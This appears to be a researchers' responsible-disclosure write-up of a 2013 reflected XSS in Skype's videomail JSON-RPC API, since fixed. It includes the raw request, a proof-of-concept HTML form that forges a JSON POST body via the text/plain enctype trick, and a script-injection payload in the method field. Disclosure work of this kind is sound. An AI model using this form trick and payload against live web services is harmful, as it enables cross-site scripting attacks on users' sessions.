XSS in Skype's videomail API

More than a year ago, we discovered a small XSS in Skype’s videomail API which landed us a warm place in Microsoft’s HoF.

Back then, Tim and Sebastian met up in Detmold to hack around a bit. Tim wanted to check out the new Skype feature Videomail and sent one to Sebastian. The email notification contained a link to a website and a PIN code.

The website used the PIN code within an AJAX request to the host vm.skype.com. The request and the response was formatted in JSON and the responses had the correct application/javascript content-type set.

However, if you set the method parameter to an invalid value, the server would return a text/html response in JSON format telling you that the method couldn’t be found.

The request looked like that:

1
2
3
4
5
6
POST /api/jsonrpc HTTP/1.1
Host: vm.skype.com
Content-Length: 157
Content-Type: text/plain

{"method":"skype.videomail.get_with_pin","params":["xxx","yyy","zzz"]}

To build the PoC we had to use a little trick to create a POST request with JSON parameters out of a normal html form.

1
2
3
<form action="https://vm.skype.com/api/jsonrpc" id="xss" method="post" enctype="text/plain">
 <input type="text" name="{"foo":"" value="bar","method":"skype.videomail.get_with_pin<script>alert(document.domain)</script>","params":["xxx","yyy","zzz"]}">
</form>

We simply add a new key/value pair by setting the input element’s name to {"foo":" and the value attribute contains the rest of the JSON string. Don’t forget to set the form’s enctype-attribute to text/plain. The final result is:

1
{"foo":"=bar","method":"skype.videomail.get_with_pin<script>alert(document.domain)</script>","params":["xxx","yyy","zzz"]}

Screenshots:

Request and response of the vulnerable endpoint

Executed alert(document.domain)

Timeline:

  • 09.08.2013 - Initial report
  • 09.08.2013 - Case-ID assigned
  • 19.08.2013 - Unconfirmed fix by the vendor
  • 25.09.2013 - Vendor asks for fix confirmation - fixed

Over and out - Team of internetwache.org